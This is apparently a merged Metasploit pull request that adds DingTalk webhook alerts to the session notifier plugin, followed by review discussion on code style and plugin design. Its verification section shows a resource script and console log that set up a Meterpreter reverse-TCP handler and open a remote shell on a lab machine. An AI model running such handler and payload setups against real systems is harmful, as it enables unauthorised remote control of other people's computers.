### PR TITLE
add Session notified to DingTalk Bot

### PR DESCRIPTION
**Pull request by cn-kali-team**
> DingTalk (Chinese: 钉钉; pinyin: Dīngdīng) is an enterprise communication and collaboration platform developed by Alibaba Group. It was founded in 2014. By 2018 it was one of the world's largest professional communication and management mobile apps in China with over 100 million users.[1] International market intentions were announced in 2018.[2] DingTalk provides iOS and Android apps as well as Mac and PC clients. --- Wikipedia

- [Wikipedia](https://en.wikipedia.org/wiki/DingTalk)
- You can find its official website [here](https://www.dingtalk.com/en).
- You can find its Development documents [here](https://ding-doc.dingtalk.com/doc#/serverapi2/qf2nxq/9e91d73c).

## Verification
- win_32.rc
```
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.76.1
set lport 7788
load session_notifier
set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=087d6d67d1de5ac577ad9ae619e8744da1a3b22de24cea14421be3969351162e
start_session_notifier
exploit
```
---
```
➜  metasploit-framework git:(Session_notified_to_DingTalk) ./msfconsole -q -r ~/win_32.rc
-----------------------------------------------------------------------------------
The pg and/or activerecord gem version has changed, meaning deprecated pg constants
may no longer be in use, so try deleting this file to see if the
'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
/home/kali-team/Projects/RubyProjects/metasploit-framework/lib/pg/deprecated_constants.rb
-----------------------------------------------------------------------------------

[*] Processing /home/kali-team/win_32.rc for ERB directives.
resource (/home/kali-team/win_32.rc)> use exploit/multi/handler
resource (/home/kali-team/win_32.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/home/kali-team/win_32.rc)> set lhost 192.168.76.1
lhost => 192.168.76.1
resource (/home/kali-team/win_32.rc)> set lport 7788
lport => 7788
resource (/home/kali-team/win_32.rc)> load session_notifier
[*] Session Notifier settings loaded from config file.
[*] Successfully loaded plugin: SessionNotifier
resource (/home/kali-team/win_32.rc)> set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=087d6d67d1de5ac577ad9ae619e8744da1a3b22de24cea14421be3969351162e
resource (/home/kali-team/win_32.rc)> start_session_notifier
[*] DingTalk notification started.
resource (/home/kali-team/win_32.rc)> exploit
[*] Started reverse TCP handler on 192.168.76.1:7788 
[*] Sending stage (176195 bytes) to 192.168.76.128
[*] Meterpreter session 1 opened (192.168.76.1:7788 -> 192.168.76.128:1157) at 2020-06-08 15:39:46 +0800
[*] Session notified to DingTalk.

meterpreter > 
```
- You need to modify the access_token for your own

## Result
- Receive session notification in chat room
```
You have a new meterpreter session!
platform : windows
tunnel : 192.168.76.1:7788 -> 192.168.76.128:1157
arch : x86
info : >
```

### CODE REVIEW

File: plugins/session_notifier.rb [hunk 1]
```diff
@@ -19,26 +22,28 @@ class SessionNotifierCommandDispatcher
...
+          'set_session_maximum_ip' => 'Set the maximum session IP range you want to be notified for',
+          'set_session_dingtalk_webhook' => 'Set the DingTalk webhook for the session notifier',
           'save_session_notifier_settings' => 'Save all the session notifier settings to framework',
-          'start_session_notifier'         => 'Start notifying sessions',
-          'stop_session_notifier'          => 'Stop notifying sessions',
-          'restart_session_notifier'       => 'Restart notifying sessions'
+          'start_session_notifier' => 'Start notifying sessions',
+          'stop_session_notifier' => 'Stop notifying sessions',
+          'restart_session_notifier' => 'Restart notifying sessions'
         }
```
Comment (Green-m) [inline plugins/session_notifier.rb:47]: Why make these changes?  The original is much neater.

Comment (cn-kali-team) [reply plugins/session_notifier.rb:47]: I ran rubocop to format the file, Do you want to change to the original.

Comment (cn-kali-team) [reply plugins/session_notifier.rb:47]: > Why make these changes? The original is much neater.

I ran rubocop to format the file, Do you want to change to the original.

Comment (Green-m) [reply plugins/session_notifier.rb:47]: Actually I am not very sure whether the MSF should apply the rubocop rules strictly, there are so many inconsistencies like this.  For me personally, I prefer the original code style, it's more readable.

Comment (dwelch-r7) [reply plugins/session_notifier.rb]: We are constantly updating our rubocop rules to try and keep things consistent across the codebase, it's awesome to see people running it on their PRs, thanks @cn-kali-team

**Comment by busterb** [comment]
DingTalk is a specific commercial service, but webhooks are generic. It seems unwise to be hardcoding a specific commercial service hook into the core library code of Metasploit, especially one that tells the third-party what targets you've exploited. It might be better just to build a generic webhook notification service (which this almost is with some modifications), and to add some documentation for how to connect it to various targets.

That or make it a plugin, which does not need to be integrated into the core library code at all (even better). You can find several plugins under the plugins/ directory that hook and notify on session creation already.

**Comment by smcintyre-r7** [comment]
@busterb The session notifier is already a plugin though, wouldn't it be better to keep notification plugins consolidated within that entry? It would particularly be useful for reducing code duplication around options like minimum and maximum IP.

**Comment by cn-kali-team** [comment]
> @busterb The session notifier is already a plugin though, wouldn't it be better to keep notification plugins consolidated within that entry? It would particularly be useful for reducing code duplication around options like minimum and maximum IP.

Yes, I agree with you, so I restored the original code

**Comment by busterb** [comment]
I guess I was thinking more that Metasploit already has separate plugins that separately notify the user about sessions: libnotify, rssfeed, session_notifier, and sounds. Fair point about 'session_notifier' already being a plugin (I misread the diff here), but while it a generic name, it doesn't cover everything either.

Maybe in an alternate world, the 'session_notifier' plugin would have been split into 2 plugins called something like 'session_notifier_sms' and 'session_notifier_smtp', and the other plugins would have similarly clear names; I'll admit I had to grep to remember all of the others. Or maybe the other session notification plugins would have been merged into session_notifier. Either way, even the current state is also a little inconsistent.

What direction generally would be the best approach if someone wanted to add even more notifiers, like to twitter or to call an AWS lambda - add another plugin or add to session_notifier? The former could make the code easier to maintain, the latter is probably nicer for users, but I'll defer to y'all on that. Don't mean to hold this up either way :)

**Comment by smcintyre-r7** [comment]
Tested successfully!
image

I wish we had a dedicated spot to put documentation for plugins where we could include steps to get the access token. I got mine by:

1. Installing "DingTalk Lite" Windows app from [here](https://page.dingtalk.com/wow/dingtalk/act/en-download)
1. Logging in with my account and clicking my avatar in the top right
1. Navigating to "Robot Management"
1. Selecting "Custom" for a new robot, then:
    1. Set the Chatbot name to "Metasploit"
    1. Added it to the only available group
    1. Added "session" as a "Custom Keyword" for the mandatory security setting
    1. Accepted the ToS
    1. Saved the value of the webhook that was provided

**Review by smcintyre-r7 — APPROVED** [review]

**Comment by smcintyre-r7** [comment]
# Release Notes
This updates the Session Notifier plugin to support sending notifications using DingTalk webhooks.

**Pull request merged**